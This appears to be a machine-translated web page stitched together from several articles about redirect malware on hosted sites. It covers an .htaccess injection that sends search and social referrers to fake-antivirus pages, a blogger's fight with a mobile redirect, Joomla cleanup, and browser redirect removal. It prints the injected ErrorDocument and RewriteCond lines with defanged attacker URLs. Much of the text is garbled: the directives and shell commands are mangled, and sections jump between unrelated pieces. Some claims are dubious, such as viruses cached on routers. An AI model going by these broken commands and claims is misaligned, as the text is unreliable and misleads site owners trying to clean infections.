htaccess mobile redirect virus. Trojan virus JS:Redirector-MC (mobile redirect) on the WordPress blog. What does this virus do

New form of the virus who see that I don't know greatly affects the sites hosted on untrusted servers, where account/sub-account users can “see” each other. In particular, hosting accounts are all made in the folder " virtual hosts"Writing and Law user folders"virtual domains" is given to the general user...reseller in most situations. This is a method that does not use typical web servers WHM/CPanel.

Action.htaccess - .htaccess Hack

Virus affects files .htaccess victims of the site. Lines added / Directives To redirect visitors(Based on Yahoo, MSN, Google, facebook, yaindex, Twitter, MySpace, etc. sites and portals with high traffic) to some sites that offer " antivirus. "This fake antivirus, Which I wrote about in the preface to.

This is what it looks like .htaccess victims: ( Can't access the contents of the links below )

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond%(HTTP_REFERER). * Yandex. *$
RewriteCond%(HTTP_REFERER). * Classmates. *$
RewriteCond%(HTTP_REFERER). * In contact with. *$
RewriteCond%(HTTP_REFERER). * Rambler. *$
RewriteCond%(HTTP_REFERER). *Tube. *$
RewriteCond%(HTTP_REFERER). *Wikipedia. *$
RewriteCond%(HTTP_REFERER). * Blogger. *$
RewriteCond%(HTTP_REFERER). * Baidu. *$
RewriteCond%(HTTP_REFERER). * Qq.com. *$
RewriteCond%(HTTP_REFERER). *Myspace. *$
RewriteCond%(HTTP_REFERER). *Twitter. *$
RewriteCond%(HTTP_REFERER). *Facebook. *$
RewriteCond%(HTTP_REFERER). *Google. *$
RewriteCond%(HTTP_REFERER). *Live. *$
RewriteCond%(HTTP_REFERER). *AOL. *$
RewriteCond%(HTTP_REFERER). * Bing. *$
RewriteCond%(HTTP_REFERER). *Amazon. *$
RewriteCond%(HTTP_REFERER). * Ebay. *$
RewriteCond%(HTTP_REFERER). *LinkedIn. *$
RewriteCond%(HTTP_REFERER). *Flickr. *$
RewriteCond%(HTTP_REFERER). *LiveJasmin. *$
RewriteCond%(HTTP_REFERER). * Soso. *$
RewriteCond%(HTTP_REFERER). *DoubleClick. *$
RewriteCond%(HTTP_REFERER). * Pornhub. *$
RewriteCond%(HTTP_REFERER). *Orkut. *$
RewriteCond%(HTTP_REFERER). * Livejournal. *$
RewriteCond%(HTTP_REFERER). *Wordpress. *$
RewriteCond%(HTTP_REFERER). * Yahoo. *$
RewriteCond%(HTTP_REFERER). *Ask. *$
RewriteCond%(HTTP_REFERER). *Excite. *$
RewriteCond%(HTTP_REFERER). *Altavista. *$
RewriteCond%(HTTP_REFERER). *MSN. *$
RewriteCond%(HTTP_REFERER). *Netscape. *$
RewriteCond%(HTTP_REFERER). *Hotbot. *$
RewriteCond%(HTTP_REFERER). * Goto. *$
RewriteCond%(HTTP_REFERER). * Infoseek. *$
RewriteCond%(HTTP_REFERER). * Mother. *$
RewriteCond%(HTTP_REFERER). *Alltheweb. *$
RewriteCond%(HTTP_REFERER). *Lycos. *$
RewriteCond%(HTTP_REFERER). * Search. *$
RewriteCond%(HTTP_REFERER). * MetaCrawler. *$
RewriteCond%(HTTP_REFERER). *Mail. *$
RewriteCond%(HTTP_REFERER). * Dogpile. *$

RewriteRule. *

RewriteCond%() REQUEST_FILENAME!-E
RewriteCond%() REQUEST_FILENAME!-D
RewriteCond%() * REQUEST_FILENAME Jpg $ |!. *. Gif$ | *. Png $
RewriteCond%(HTTP_USER_AGENT). *Windows*.
RewriteRule. *

Those who use WordPress will find these lines in the file .htaccess from public_html. In addition, the virus creates. Htaccess file in the same folder WP content.

*There are also situations in which peoriavascularsurgery.com appears instead dns.thesoulfoodcafe.com or other addresses.

What does this virus do?

Once redirected, visitors are welcomed with open arms by the message:

Attention!
The computer contains various signs of the presence of viruses and malware. Your virus protection system needs to be checked immediately!
The security system will perform a quick and free scan of your computer for viruses and malware.

No matter which button is pressed, we are taken to the page" My computer"Created to imitate XP design. This automatically starts a "scan" at the end of which we find that it is "infected".

After clicking OK or Cancel button, it will start download Files setup.exe. This setup.exe is a fake antivirus affecting the system. The installation of some malware spreads further than the links are compromised, and in addition these antivirus software(all false) that the victim is being offered to buy.
Those who have already contacted the virus can use this form. Additionally, it is recommended to scan the entire hard drive. Recommend Kaspersky Internet Security or Kaspersky Anti-Virus.

This type of virus infects the visitor of the OS operating system Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 and Windows 95. To date, there are no known cases of infection of the Windows Vista and Windows 7 operating systems.

How can we eliminate this virus. Htaccess file to the server and how to prevent infection.

1. Analysis of suspicious files and erasing codes. To make sure that the file is not touched only .htaccess You must analyze all files .php si . Js.

2. Overwrite the file. Htaccess and install CHMOD 644 or 744 with write access only user owner.

3. When creating a hosting account for a website in the folder / Home or /webroot This will automatically create a folder that often has a username ( user for Cpanel, FTP Etc.). To prevent data recording and virus transmission from one user to another, it is recommended that each user's folder should be set to:

CHMOD 644 or 744, 755 - 644 shown.
Chaun-R number_user number_folder.
CHGRP-R number_user number_folder

LS-all ways to check if they were done correctly. Something like this should appear:

Dynamics of dynamic speaker drwx-x-x 12 4096 May 6 14: dynamics 51 /
drwx-x-x 10 duran duran 4096 Mar 7 07: 46 duran /
drwx-x-x 12 Tube Test Tube 4096 Jan 29 11:23 Tube /
drwxr-xr-x 14 Express 4096 Feb 26 2009 express /
drwxr-xr-x 9 ezo ezo 4096 May 19 01: 09 ezo /
drwx-x-x 9 farm 4096 farm 19 22: 29 farm /

If one of the above userele FTP Infected files She cannot send a virus to another user of the host. A minimum security measure to protect accounts hosted on a web server.

Common elements of areas affected by this virus.

All areas affected redirect visitors to sites with a domain name containing "/ main.php? e = 4&h ".

This " virus. htaccess"Affect any CMS ( Joomla, WordPress, PHPBB Etc.) using .htaccess.

. Htaccess Redirect Virus Hack &.

Last Monday, my six-month epic struggle against a malicious mobile redirect discovered by Yandex on two of my projects ended.
(Here's my story in two parts...)

Picture from here: http://rebill.me/showthread.php?t=1804
there are many more pictures and words about malicious mobile redirect.

One not so wonderful morning I received this letter from Yandex.Webmaster:

Hello, ***!

Code has been detected on the pages of your website **** that may be dangerous for visitors. Executing this code when visiting a site can lead to undesirable consequences for the user: infection of the computer with malware, unauthorized use of its resources, damage or theft of personal data.
Currently, the site appears in search results with the label “This site may threaten the security of your computer.”
Yandex does not evaluate the content of the site in any way and warns users that the site could be infected without the knowledge of its owners.
Please remove the malicious code. If the code is not found during a new scan, the mark in the search results will be removed. In order to remove the mark as quickly as possible, immediately after deleting the code, you can request a recheck of the site.

—
Sincerely,
Yandex.Webmaster
http://webmaster.yandex.ru

I was not immediately able to believe that there was malicious code on my project; it was much easier to believe that Yandex, with its behavioral (behavioral) algorithm, made a mistake and falsely accused my increasingly popular project... After reading more carefully the information on the “Security” tab, looking at what comments are given by Yandex when I try to go from the search results to my infected site, I realized that it’s about about malicious mobile redirect.

I started experimenting on mobile devices: from the Google search engine I went to the main page of my website, went to the page with content and... was redirected to some vague site with an address like aloobe.com with a single button “NEED TO URGENTLY UPDATE Adobe Player” - this was proof that Yandex was right and I was wrong...

God knows what it cost me to fight this malicious mobile redirect, to fight for the purity of my projects... I re-read mountains of literature, removed widgets and plugins, changed themes, in a fit of despair I even changed the hoster, which had been tested for years, the search for a malicious redirect was conducted as if inside the Database , and in folders serving projects.

In the end, everything turned out to be ridiculously simple, but I will tell you about this in the next article, and today I will tell you about the plugin that closed the gap. I sent the site for re-checking, Yandek stopped marking my site as infected, readers returned and this problem no longer occurred on my projects! Or rather, the problem remained (because it took me six months to find a solution to it), but it was isolated from my readers and none of the visitors to my sites could fall into the clutches of swindlers.

The plugin is called Verve Mobile. At this point I was going to link to the plugin and end the post, but there was only one discussion left from this plugin on wordpress.org:
http://wordpress.org/support/plugin/verve-mobile-plugin.

To finish this article with dignity, I saved this popular plugin. You can download it. Of course, I won’t be able to provide support for it, but it works on my projects without problems, recognizing mobile devices and giving them site content in a special template “for viewing from mobile devices.”

The only drawback of the plugin that I discovered was that when the plugin was activated, I couldn’t . I circumvented this drawback by deactivating Verve Mobile for a few minutes, which is needed for authorization using OpenId.

PS Before installing the plugin, make sure that .htaccess The file located in the root directory of your site contains, in addition to the WordPress entry:

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %(REQUEST_FILENAME) !-f
RewriteCond %(REQUEST_FILENAME) !-d
RewriteRule. /index.php [L]

only what you entered there yourself for some reason and nothing unnecessary or inexplicable.

If you find some dubious redirects in the .htaccess file, remove all unnecessary things from it - this will most likely be a solution to the problem of malicious mobile redirects. Be careful and scroll to the bottom of the .htaccess file, sometimes attackers add a LOT of empty lines there so that their redirect code is not visible on the first page.

To be continued…

Yesterday I was rushing around all day in a hurry and in a hurry, and it just so happened that I was completely free only now, so the publication of the note promised from the evening before yesterday was somewhat delayed.

Two days ago I briefly talked about the problems that have befallen me in recent days, and now I intend to describe the situation that I focused on in the previous post - viruses on my sites.

In general, it was like this.

On November 10, at around 5 p.m., a notification from Yandex with the subject “Potentially dangerous code has been detected on the site”, which was discovered on the pages of the site. According to Yandex, this code can be dangerous for visitors, and therefore, in the search results, my site was displayed with the mark .

Your subscriber account has received a payment in the amount of: 0 rub.
payment type: At the expense of Hostland.ru
and a bonus was credited in the amount of: 1668 rubles.
You have also been credited with domain bonuses in the amount of: 1

Even despite all this, I am still satisfied with the work of my hosting, especially since in the end we managed to figure everything out and get rid of the so-called troubles. Replenishing my account was not an unimportant moment for me, and I will not hide, I think that it was very appropriate, after everything that I had to face.

In the note, I have not yet mentioned anywhere that in the process of searching for malicious code and on the advice of customer support specialists, I I had to check my computer for viruses. In addition to all this, I checked my site for viruses using several online scanners, which naturally required additional time, which I believe was not wasted - being overly confident never hurt anyone.

No malicious code was detected on the site

She managed to amuse me with the atmosphere and please me with the replenishment of my account, added new knowledge and experience, but the most unpleasant thing is that she made me nervous, but I shouldn’t be nervous - it has a bad effect on my well-being!

In general, God forbid someone else faces the same problem, because until the very last moment only you will be considered a fool.

How to treat a search redirect virus in Joomla

How to treat a search redirect virus in Joomla

28.04.2016

When administering a Joomla website, you periodically have to disinfect the system after any hacks. One of the most unpleasant is the so-called search redirect virus, when the site is broken by a shell and then inserted search redirect inserts, as a result, your site appears in the search engine, but redirects the user to porn or Islamic sites. As a result, after the transition you receive the following message:

Then the search engine will begin to issue a similar message indicating that your site is infected or hacked. And in Yandex you’ll even lose your position. As a result, you have lost traffic, loss of customers, lack of orders.

Recovery procedure.

1. Make a backup and download.
2. If the hosting does not have an anti-virus check, then run the downloaded backup with an anti-virus. We find the shell virus files, in my case it is PHP.Shell.387. This is a type of virus that exploits a “hole” in the security of the control system.

3. Delete virus files on the hosting.
4. Change passwords in the admin panel, FTP
5. Since searching for Trojans does not give any effect, and manually searching for where the PHP code was embedded takes quite a long time, and is not always effective, I make a backup mix. Mix is ​​any file backup of the site before the introduction of viruses, the database remains current, not from the backup, then we take the folder from the fresh backup images with pictures and folder componentscom_jshoppingfilesimg_products Where are the product photos?
Result: we are happy with the result.
P.S. What to do if there is no backup? or involve specialists for this. Perhaps a hosting backup will help, but it will be automatically overwritten and most likely will not save you, as it will contain a virus.

Subsequent prevention:

1. Saving doesn't have to be frugal. Change the control system if possible.
2. Definitely change hosting. You shouldn't skimp on this. In my experience on timeweb, the same Joomla was broken twice, but that’s half the trouble. The key thing was that the hosting does not even scan its servers for viruses once a quarter. I recommend using a hosting that runs daily antivirus scans, and a free manual antivirus scan service is also available. For example, this is reg.ru
3. Do not save FTP passwords.

Everyone has probably encountered automatic redirection to virus sites. You just need to skip the infected spam email and Redirect is right there. In this post, we will look at what it is and how to remove a redirect in the Chrome browser, Yandex Browser, Opera and Mozilla.

What is Redirect? In fact, a redirect is an automatic redirection from one site to another. By its intended purpose, Redirect is used when a site has changed its domain name. For example, an online store or commercial site has moved, and in order not to lose customers who visited the old address, a redirect is set up. However, if you go to a well-known site that has existed for a long time, and you are suddenly transferred to the site of the virtual casino Vulcan, it means that you are faced with a viral redirect.

In general, it is known that Redirect is not a dangerous virus: it will not cause any harm to the computer, but it is very annoying, in addition, it slows down the browser. Moreover, if you like to play with toys in your spare time, as I do, you will immediately notice its negative impact. At the first manifestations of this virus, you need to get rid of it as quickly as possible.

How to determine that you have this Redirect virus?

1. Your browser is slowing down.
2. Sometimes when you access a website, you are redirected to an advertising page.
3. Quite unexpectedly, advertising banners appear on the open page.

To remove Redirect, you can first simply try clearing the cache. Sometimes the problem may be hidden in the router. Since the virus is cached on your device, you could pick it up somewhere on someone else’s router, bring it home and infect all the equipment connected to your router. Then you need to clean the router and change the passwords. Then clear the caches of all devices. If this does not help, then you will have to take a couple of minutes to thoroughly clean the entire system. We have figured out what Redirect is, now we move on to the next stage - clearing redirects.

How to remove Redirect

How did I remove Redirect from the site? First, to be on the safe side, I saved all the important data from the computer to a removable hard drive. Then I removed the old antivirus and installed a new one. You can install traditional Dr.Web or NOD32. I decided to try Avast, which was praised by a friend who quite successfully got rid of this infection with a redirect. If you do not yet have cleaning applications such as SpyHunter and CCleaner installed, don’t be lazy. They will help you clean the registry.

1. So, first open the “Task Manager” and close all unknown processes.
2. We run a scan with an antivirus program. It can last from 5 minutes to half an hour.
3. We check all hard drives and browsers.
4. We treat all malware that cannot be treated - we simply remove it. You should avoid rebooting at this stage.
5. We perform a full system scan using SpyHunter or CCleaner.
6. During the scanning process, the system will again offer to reboot - we refuse. We clean all malicious objects.

In most cases, the redirect directs you to sites with advertising or fake services, such as search engines. I have already described several dozen instructions for removing such redirects. Therefore, you need to follow all the steps below and read the article intended for the viral site to which you are being redirected. To avoid this happening again.

The most popular opening sites: